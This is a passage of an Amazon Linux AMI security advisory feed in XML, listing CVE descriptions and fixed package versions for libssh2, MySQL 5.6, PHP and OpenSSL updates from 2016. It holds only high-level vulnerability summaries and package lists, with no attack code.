</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293" title="" id="CVE-2015-0293" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3197" title="" id="CVE-2015-3197" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0703" title="" id="CVE-2016-0703" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0704" title="" id="CVE-2016-0704" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0800" title="" id="CVE-2016-0800" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl098e" version="0.9.8e" release="29.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl098e-0.9.8e-29.19.amzn1.x86_64.rpm</filename></package><package name="openssl098e-debuginfo" version="0.9.8e" release="29.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl098e-debuginfo-0.9.8e-29.19.amzn1.x86_64.rpm</filename></package><package name="openssl098e" version="0.9.8e" release="29.19.amzn1" epoch="0" arch="i686"><filename>Packages/openssl098e-0.9.8e-29.19.amzn1.i686.rpm</filename></package><package name="openssl098e-debuginfo" version="0.9.8e" release="29.19.amzn1" epoch="0" arch="i686"><filename>Packages/openssl098e-debuginfo-0.9.8e-29.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-683</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-683: medium priority package update for libssh2</title><issued date="2016-04-06 14:40:00" /><updated date="2016-04-06 14:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0787:
A type confusion issue was found in the way libssh2 generated ephemeral secrets for the diffie-hellman-group1 and diffie-hellman-group14 key exchange methods. This would cause an SSHv2 Diffie-Hellman handshake to use significantly less secure random parameters.
1306021:
CVE-2016-0787 libssh2: bits/bytes confusion resulting in truncated Diffie-Hellman secret length
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0787" title="" id="CVE-2016-0787" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libssh2-docs" version="1.4.2" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-docs-1.4.2-2.13.amzn1.x86_64.rpm</filename></package><package name="libssh2" version="1.4.2" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-1.4.2-2.13.amzn1.x86_64.rpm</filename></package><package name="libssh2-devel" version="1.4.2" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-devel-1.4.2-2.13.amzn1.x86_64.rpm</filename></package><package name="libssh2-debuginfo" version="1.4.2" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-debuginfo-1.4.2-2.13.amzn1.x86_64.rpm</filename></package><package name="libssh2" version="1.4.2" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-1.4.2-2.13.amzn1.i686.rpm</filename></package><package name="libssh2-devel" version="1.4.2" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-devel-1.4.2-2.13.amzn1.i686.rpm</filename></package><package name="libssh2-debuginfo" version="1.4.2" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-debuginfo-1.4.2-2.13.amzn1.i686.rpm</filename></package><package name="libssh2-docs" version="1.4.2" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-docs-1.4.2-2.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-684</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-684: important priority package update for mysql56</title><issued date="2016-04-06 14:40:00" /><updated date="2016-04-06 14:40:00" /><severity>important</severity><description>Package updates are 
available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0616:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
1301510:
CVE-2016-0616 mysql: unspecified vulnerability in subcomponent: Server: Optimizer (CPU January 2016)
CVE-2016-0611:
Unspecified vulnerability in Oracle MySQL 5.6.27 and earlier and 5.7.9 allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
1301509:
CVE-2016-0611 mysql: unspecified vulnerability in subcomponent: Server: Optimizer (CPU January 2016)
CVE-2016-0610:
Unspecified vulnerability in Oracle MySQL 5.6.27 and earlier and MariaDB before 10.0.22 and 10.1.x before 10.1.9 allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
1301508:
CVE-2016-0610 mysql: unspecified vulnerability in subcomponent: Server: InnoDB (CPU January 2016)
CVE-2016-0609:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to privileges.
1301507:
CVE-2016-0609 mysql: unspecified vulnerability in subcomponent: Server: Security: Privileges (CPU January 2016)
CVE-2016-0608:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via vectors related to UDF.
1301506:
CVE-2016-0608 mysql: unspecified vulnerability in subcomponent: Server: UDF (CPU January 2016)
CVE-2016-0607:
Unspecified vulnerability in Oracle MySQL 5.6.27 and earlier and 5.7.9 allows remote authenticated users to affect availability via unknown vectors related to replication.
1301505:
CVE-2016-0607 mysql: unspecified vulnerability in subcomponent: Server: Replication (CPU January 2016)
CVE-2016-0606:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect integrity via unknown vectors related to encryption.
1301504:
CVE-2016-0606 mysql: unspecified vulnerability in subcomponent: Server: Security: Encryption (CPU January 2016)
CVE-2016-0605:
Unspecified vulnerability in Oracle MySQL 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors.
1301503:
CVE-2016-0605 mysql: unspecified vulnerability in subcomponent: Server: General (CPU January 2016)
CVE-2016-0601:
Unspecified vulnerability in Oracle MySQL 5.7.9 allows remote authenticated users to affect availability via unknown vectors related to Partition.
1301502:
CVE-2016-0601 mysql: unspecified vulnerability in subcomponent: Server: Partition (CPU January 2016)
CVE-2016-0600:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
1301501:
CVE-2016-0600 mysql: unspecified vulnerability in subcomponent: Server: InnoDB (CPU January 2016)
CVE-2016-0599:
Unspecified vulnerability in Oracle MySQL 5.7.9 allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
1301500:
CVE-2016-0599 mysql: unspecified vulnerability in subcomponent: Server: Optimizer (CPU January 2016)
CVE-2016-0598:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via vectors related to DML.
1301498:
CVE-2016-0598 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU January 2016)
CVE-2016-0597:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
1301497:
CVE-2016-0597 mysql: unspecified vulnerability in subcomponent: Server: Optimizer (CPU January 2016)
CVE-2016-0596:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier and 5.6.27 and earlier and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via vectors related to DML.
1301496:
CVE-2016-0596 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU January 2016)
CVE-2016-0595:
Unspecified vulnerability in Oracle MySQL 5.6.27 and earlier allows remote authenticated users to affect availability via vectors related to DML.
1301495:
CVE-2016-0595 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU January 2016)
CVE-2016-0594:
Unspecified vulnerability in Oracle MySQL 5.6.21 and earlier allows remote authenticated users to affect availability via vectors related to DML.
1301494:
CVE-2016-0594 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU January 2016)
CVE-2016-0546:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Client.
1301493:
CVE-2016-0546 mysql: unspecified vulnerability in subcomponent: Client (CPU January 2016)
CVE-2016-0505:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to Options.
1301492:
CVE-2016-0505 mysql: unspecified vulnerability in subcomponent: Server: Options (CPU January 2016)
CVE-2016-0504:
Unspecified vulnerability in Oracle MySQL 5.6.27 and earlier and 5.7.9 allows remote authenticated users to affect availability via vectors related to DML, a different vulnerability than CVE-2016-0503.
1301491:
CVE-2016-0504 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU January 2016)
CVE-2016-0503:
Unspecified vulnerability in Oracle MySQL 5.6.27 and earlier and 5.7.9 allows remote authenticated users to affect availability via vectors related to DML, a different vulnerability than CVE-2016-0504.
1301490:
CVE-2016-0503 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU January 2016)
CVE-2016-0502:
Unspecified vulnerability in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
1301489:
CVE-2016-0502 mysql: unspecified vulnerability in subcomponent: Server: Optimizer (CPU January 2016)
CVE-2015-7744:
wolfSSL (formerly CyaSSL) before 3.6.8 does not properly handle faults associated with the Chinese Remainder Theorem (CRT) process when allowing ephemeral key exchange without low memory optimizations on a server, which makes it easier for remote attackers to obtain private RSA keys by capturing TLS handshakes, aka a Lenstra attack.
1301488:
CVE-2015-7744 yaSSL, wolfSSL: insufficient hardening of RSA-CRT implementation (Oracle MySQL CPU Jan 2016)
CVE-2015-4913:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect availability via vectors related to Server : DML, a different vulnerability than CVE-2015-4858.
1274794:
CVE-2015-4913 mysql: unspecified vulnerability related to Server:DML (CPU October 2015)
CVE-2015-4910:
Unspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Memcached.
1274792:
CVE-2015-4910 mysql: unspecified vulnerability related to Server:Memcached (CPU October 2015)
CVE-2015-4905:
Unspecified vulnerability in Oracle MySQL Server 5.6.23 and earlier allows remote authenticated users to affect availability via vectors related to Server : DML.
1274790:
CVE-2015-4905 mysql: unspecified vulnerability related to Server:DML (CPU October 2015)
CVE-2015-4904:
Unspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to libmysqld.
1274787:
CVE-2015-4904 mysql: unspecified vulnerability related to libmysqld (CPU October 2015)
CVE-2015-4895:
Unspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB.
1274786:
CVE-2015-4895 mysql: unspecified vulnerability related to Server:InnoDB (CPU October 2015)
CVE-2015-4890:
Unspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Replication.
1274785:
CVE-2015-4890 mysql: unspecified vulnerability related to Server:Replication (CPU October 2015)
CVE-2015-4879:
Unspecified vulnerability in Oracle MySQL Server 5.5.44 and earlier, and 5.6.25 and earlier, allows remote authenticated users to affect confidentiality, integrity, and availability via vectors related to DML.
1274783:
CVE-2015-4879 mysql: unspecified vulnerability related to Server:DML (CPU October 2015)
CVE-2015-4870:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : Parser.
1274781:
CVE-2015-4870 mysql: unspecified vulnerability related to Server:Parser (CPU October 2015)
CVE-2015-4866:
Unspecified vulnerability in Oracle MySQL Server 5.6.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB.
1274780:
CVE-2015-4866 mysql: unspecified vulnerability related to Server:InnoDB (CPU October 2015)
CVE-2015-4864:
Unspecified vulnerability in Oracle MySQL Server 5.5.43 and earlier and 5.6.24 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server : Security : Privileges.
1274779:
CVE-2015-4864 mysql: unspecified vulnerability related to Server:Security:Privileges (CPU October 2015)
CVE-2015-4862:
Unspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via vectors related to DML.
1274778:
CVE-2015-4862 mysql: unspecified vulnerability related to Server:DML (CPU October 2015)
CVE-2015-4861:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB.
1274776:
CVE-2015-4861 mysql: unspecified vulnerability related to Server:InnoDB (CPU October 2015)
CVE-2015-4858:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via vectors related to DML, a different vulnerability than CVE-2015-4913.
1274773:
CVE-2015-4858 mysql: unspecified vulnerability related to Server:DML (CPU October 2015)
CVE-2015-4836:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : SP.
1274771:
CVE-2015-4836 mysql: unspecified vulnerability related to Server:SP (CPU October 2015)
CVE-2015-4833:
Unspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition.
1274770:
CVE-2015-4833 mysql: unspecified vulnerability related to Server:Partition (CPU October 2015)
CVE-2015-4830:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server : Security : Privileges.
1274767:
CVE-2015-4830 mysql: unspecified vulnerability related to Server:Security:Privileges (CPU October 2015)
CVE-2015-4826:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect confidentiality via unknown vectors related to Server : Types.
1274766:
CVE-2015-4826 mysql: unspecified vulnerability related to Server:Types (CPU October 2015)
CVE-2015-4819:
Unspecified vulnerability in Oracle MySQL Server 5.5.44 and earlier, and 5.6.25 and earlier, allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Client programs.
1274764:
CVE-2015-4819 mysql: unspecified vulnerability related to Client programs (CPU October 2015)
CVE-2015-4815:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect availability via vectors related to Server : DDL.
1274759:
CVE-2015-4815 mysql: unspecified vulnerability related to Server:DDL (CPU October 2015)
CVE-2015-4807:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier, when running on Windows, allows remote authenticated users to affect availability via unknown vectors related to Server : Query Cache.
1274758:
CVE-2015-4807 mysql: unspecified vulnerability related to Server:Query Cache (CPU October 2015)
CVE-2015-4802:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition, a different vulnerability than CVE-2015-4792.
1274756:
CVE-2015-4802 mysql: unspecified vulnerability related to Server:Partition (CPU October 2015)
CVE-2015-4800:
Unspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Optimizer.
1274754:
CVE-2015-4800 mysql: unspecified vulnerability related to Server:Optimizer (CPU October 2015)
CVE-2015-4792:
Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition, a different vulnerability than CVE-2015-4802.
1274752:
CVE-2015-4792 mysql: unspecified vulnerability related to Server:Partition (CPU October 2015)
CVE-2015-4791:
Unspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Security : Privileges.
1274749:
CVE-2015-4791 mysql: unspecified vulnerability related to Server:Security:Privileges (CPU October 2015)
CVE-2015-4766:
Unspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows local users to affect availability via unknown vectors related to Server : Security : Firewall.
1274748:
CVE-2015-4766 mysql: unspecified vulnerability related to Server:Security:Firewall (CPU October 2015)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4766" title="" id="CVE-2015-4766" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4791" title="" id="CVE-2015-4791" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4792" title="" id="CVE-2015-4792" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4800" title="" id="CVE-2015-4800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4802" title="" id="CVE-2015-4802" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4807" title="" id="CVE-2015-4807" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4815" title="" id="CVE-2015-4815" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4819" title="" id="CVE-2015-4819" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4826" title="" id="CVE-2015-4826" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4830" title="" id="CVE-2015-4830" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4833" title="" id="CVE-2015-4833" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4836" title="" id="CVE-2015-4836" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4858" title="" id="CVE-2015-4858" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4861" title="" id="CVE-2015-4861" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4862" title="" id="CVE-2015-4862" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4864" title="" id="CVE-2015-4864" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4866" title="" id="CVE-2015-4866" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4870" title="" id="CVE-2015-4870" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4879" title="" id="CVE-2015-4879" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4890" title="" id="CVE-2015-4890" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4895" title="" id="CVE-2015-4895" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4904" title="" id="CVE-2015-4904" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4905" title="" id="CVE-2015-4905" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4910" title="" id="CVE-2015-4910" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4913" title="" id="CVE-2015-4913" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7744" title="" id="CVE-2015-7744" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0502" title="" id="CVE-2016-0502" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0503" title="" id="CVE-2016-0503" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0504" title="" id="CVE-2016-0504" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0505" title="" id="CVE-2016-0505" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0546" title="" id="CVE-2016-0546" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0594" title="" id="CVE-2016-0594" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0595" title="" id="CVE-2016-0595" 
type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0596" title="" id="CVE-2016-0596" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0597" title="" id="CVE-2016-0597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0598" title="" id="CVE-2016-0598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0599" title="" id="CVE-2016-0599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0600" title="" id="CVE-2016-0600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0601" title="" id="CVE-2016-0601" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0605" title="" id="CVE-2016-0605" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0606" title="" id="CVE-2016-0606" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0607" title="" id="CVE-2016-0607" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0608" title="" id="CVE-2016-0608" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0609" title="" id="CVE-2016-0609" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0610" title="" id="CVE-2016-0610" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0611" title="" id="CVE-2016-0611" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0616" title="" id="CVE-2016-0616" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-test" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.29" 
release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.29" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.29-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.29-1.14.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.29" release="1.14.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql56-common-5.6.29-1.14.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.29-1.14.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.29-1.14.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.29-1.14.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.29-1.14.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.29-1.14.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.29-1.14.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.29-1.14.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.29-1.14.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.29" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.29-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-685</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-685: medium priority package update for php56 php55</title><issued date="2016-04-13 11:45:00" /><updated date="2016-04-13 11:45:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2554:
1305543:
CVE-2016-2554 php: Stack overflow vulnerability when decompressing tar phar archives
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2554" title="" id="CVE-2016-2554" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-tidy" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" 
